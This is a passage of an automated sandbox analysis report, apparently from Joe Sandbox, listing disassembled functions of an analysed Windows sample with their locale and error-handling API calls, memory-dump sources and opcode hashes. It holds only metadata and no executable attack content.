                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                      • Opcode ID: acd900a1b2ed66547b9001480ba1d541b1b988f8f232410595f2b9d57efec6ce
                                                                                                                                                                                                                      • Instruction ID: d926f73229bc8671aded0653bd9f22bf7cf4b57c85418e1c64e47a1cc8cec889
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: acd900a1b2ed66547b9001480ba1d541b1b988f8f232410595f2b9d57efec6ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D831D2749012289BCB61DF24D988BCCBBB9BF08310F5451EAE40CA72A1EB709FC58F55
                                                                                                                                                                                                                      Function 00621EEC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0062031D,?,20001004,00000000,00000002,?,?,0061F91F), ref: 00621F20
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                                                      • String ID: #Da
                                                                                                                                                                                                                      • API String ID: 2299586839-1810561636
                                                                                                                                                                                                                      • Opcode ID: 48814419891555137403a725546d343852ee194f1d5e6ae9878cd3930abb6ad8
                                                                                                                                                                                                                      • Instruction ID: ce25a955036f9ca612befff4d026ed7374c00b06f9322acec412799ac9ccac6b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48814419891555137403a725546d343852ee194f1d5e6ae9878cd3930abb6ad8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0E04831504928B7CF222F50EC09E9E3F57EF45751F044024FD1556161D7728D219ED5
                                                                                                                                                                                                                      Function 0065434A Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: /$UT
                                                                                                                                                                                                                      • API String ID: 0-1626504983
                                                                                                                                                                                                                      • Opcode ID: b2a7b88651c570a1f19ef2bbb58293d964c61f5f78815f1021afd98b82df09be
                                                                                                                                                                                                                      • Instruction ID: 369c55c296b96bfaaefd2f891e31dc88101960ce8c05e99935c8e2576eef7c42
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2a7b88651c570a1f19ef2bbb58293d964c61f5f78815f1021afd98b82df09be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85027FB19042688BDF21CF64C8807EE77B6AF45309F1441E9DD49AB246DB309EC9CF95
                                                                                                                                                                                                                      Function 006513E2 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: ``C$x`C
                                                                                                                                                                                                                      • API String ID: 0-4276601940
                                                                                                                                                                                                                      • Opcode ID: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
                                                                                                                                                                                                                      • Instruction ID: 4f037b7240598a9acba1ea64ff5829ed5dc9a58f553085d483c04c7af496a624
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4639c864b91f6e9cc3f469510a2f9944f86d2f54ec5b532889058d1e4e41c286
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D51B3729001169BEB18CF58D4817E973B2EFC5305F2694BECC4AEF286EB705A49CB54
                                                                                                                                                                                                                      Function 00626625 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00626620,?,?,?,?,?,?,00000000), ref: 00626852
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                                                                                      • Opcode ID: f62a020f105c6271e34d72e0767b23d1cf7220ff953564a7fb42004346f7690c
                                                                                                                                                                                                                      • Instruction ID: 5efa683394f1f9fe6676819ea349374b2088e83579e7da147989b3bf1cb893e1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f62a020f105c6271e34d72e0767b23d1cf7220ff953564a7fb42004346f7690c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CB15B35610A19DFD719CF28D486AA47BA2FF05364F258658F89ACF3A1C335E992CF40
                                                                                                                                                                                                                      Function 0062735B Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 407fdf7ad68301b43e13f1a0dbad86f1a3dd986065835effb0701d5f653069da
                                                                                                                                                                                                                      • Instruction ID: 302ad9f144bcf36db67441def07365f1459ce2349a23310cc82378db9ee3b508
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 407fdf7ad68301b43e13f1a0dbad86f1a3dd986065835effb0701d5f653069da
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0231DC719046296FDB20EFB8DC85DFB77AEEB84314F144159FD0597241EA309E408F54
                                                                                                                                                                                                                      Function 00629F87 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00629FDB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                      • Opcode ID: 2d4dc385acae57c116f57f80937b4e5e5f514debc957104a7958b763e017f233
                                                                                                                                                                                                                      • Instruction ID: 0aacc235d6e065c68c989a356ab77880edbd59dc4482c0ed8c55e561bab021f6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d4dc385acae57c116f57f80937b4e5e5f514debc957104a7958b763e017f233
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7221D032610A26ABDB289B64EC41ABB33AAEF55314B10007EF902D7241EBB4EC44CF55
                                                                                                                                                                                                                      Function 00629C0E Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00629D34,00000001,00000000,?,-00000050,?,0062A365,00000000,?,?,?,00000055,?), ref: 00629C80
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                      • Opcode ID: 750a32870eda9470cb04d7ba3fd7554658ed6089f2a380265434ec18de23668f
                                                                                                                                                                                                                      • Instruction ID: 1247920d8a5012ef83a87c1fc55fb5441712c0ccf826a7dfa4412ee6ff8432ab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 750a32870eda9470cb04d7ba3fd7554658ed6089f2a380265434ec18de23668f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7511E03A200B019FDB189F39D8915BAB7A2FFC0358B14882DE98687B40D371A802CB60
                                                                                                                                                                                                                      Function 0062A1B6 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00629F50,00000000,00000000,?), ref: 0062A1E2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                                                                      • Opcode ID: 75cbd3a8c3373b4b99907b813bb2a1753f880ec9ff35bc4aff14ddae055ecebb
                                                                                                                                                                                                                      • Instruction ID: 09d21d7be55ed3f4ca816ab250f62be89d7815810057e24497243347356bcb13
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75cbd3a8c3373b4b99907b813bb2a1753f880ec9ff35bc4aff14ddae055ecebb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30F0FE32550535EBDB2456A09C05BFA7755DB40354F184429DC02A3540DAB2FE42CDA1
                                                                                                                                                                                                                      Function 00629CA9 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00629F87,00000001,?,?,-00000050,?,0062A329,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00629CF3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                      • Opcode ID: ec1806ec9781082eca4056e9c3a88df17eaf319a3b8bc9f3032e3b02e6f72c26
                                                                                                                                                                                                                      • Instruction ID: 5a786dbaff7488c3b32fcb2fd47e7770cbb4f19ddbbd2475fdb058d96a82695b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec1806ec9781082eca4056e9c3a88df17eaf319a3b8bc9f3032e3b02e6f72c26
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBF0FC36304B145FD7145F35EC81AB67B96FFC0358F05842DF9458B690C6B16C02DE64
                                                                                                                                                                                                                      Function 00621A42 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0061B934: EnterCriticalSection.KERNEL32(-00699CC8,?,0061E42A,00000000,00636800,0000000C,0061E3F1,?,?,00622176,?,?,006218E8,00000001,00000364,00000000), ref: 0061B943
                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00621A35,00000001,006369D0,0000000C,00621DE8,00000000), ref: 00621A7A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                                                                                                      • Opcode ID: 9f4f72c962ce68405033559673f9670a41da6f256b49568db81cce7c273f6fce
                                                                                                                                                                                                                      • Instruction ID: fca08377b0c3b2ad84b230d8e588c17f0b4d2ac8628de2f1260e0445cacb1630
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f4f72c962ce68405033559673f9670a41da6f256b49568db81cce7c273f6fce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10F03732A44214EFDB00DFA8E842B9D77F2FB05720F00512AF4119B2A1DB7559418F94
                                                                                                                                                                                                                      Function 00629BC3 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0062174A: GetLastError.KERNEL32(?,00000000,0061E09F,?,?,?,?,00000003,0061B5E5,?,0061B554,00000000,00000016,0061B763), ref: 0062174E
                                                                                                                                                                                                                        • Part of subcall function 0062174A: SetLastError.KERNEL32(00000000,00000016,0061B763,?,?,?,?,?,00000000), ref: 006217F0
                                                                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00629B1C,00000001,?,?,?,0062A387,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00629BFA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                                                                      • Opcode ID: e7b687e39c2443eb3744eb341e65d254f81b4854666f1bac88b1a083edca63a9
                                                                                                                                                                                                                      • Instruction ID: 6e8c2e8ad203e886ba4d56c236638ac81fa8e39bb3e84560d45293a492637d88
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7b687e39c2443eb3744eb341e65d254f81b4854666f1bac88b1a083edca63a9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AF0E53A30061557CB149F35EC556AABFA6EFC2761F0A8059EA068B291C6719843DB70
                                                                                                                                                                                                                      Function 00617952 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000795E,00616DE9), ref: 00617957
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510224170.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510304457.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510418728.0000000000698000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510453441.0000000000699000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000000.00000002.1510487252.000000000069B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_610000_file.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                                                                                                      • Opcode ID: 0169e9005a7433a96a7fe9e2a905bbed7a0fb56ebc56d60e9f5587e7b40dd9b5
                                                                                                                                                                                                                      • Instruction ID: 238ba71b748bdd011fd6290d13b0ce4ebaad37ad4cad5bb96177086a2d2153c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0169e9005a7433a96a7fe9e2a905bbed7a0fb56ebc56d60e9f5587e7b40dd9b5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                                                                                                      Function 00611E05 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.1510259838.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
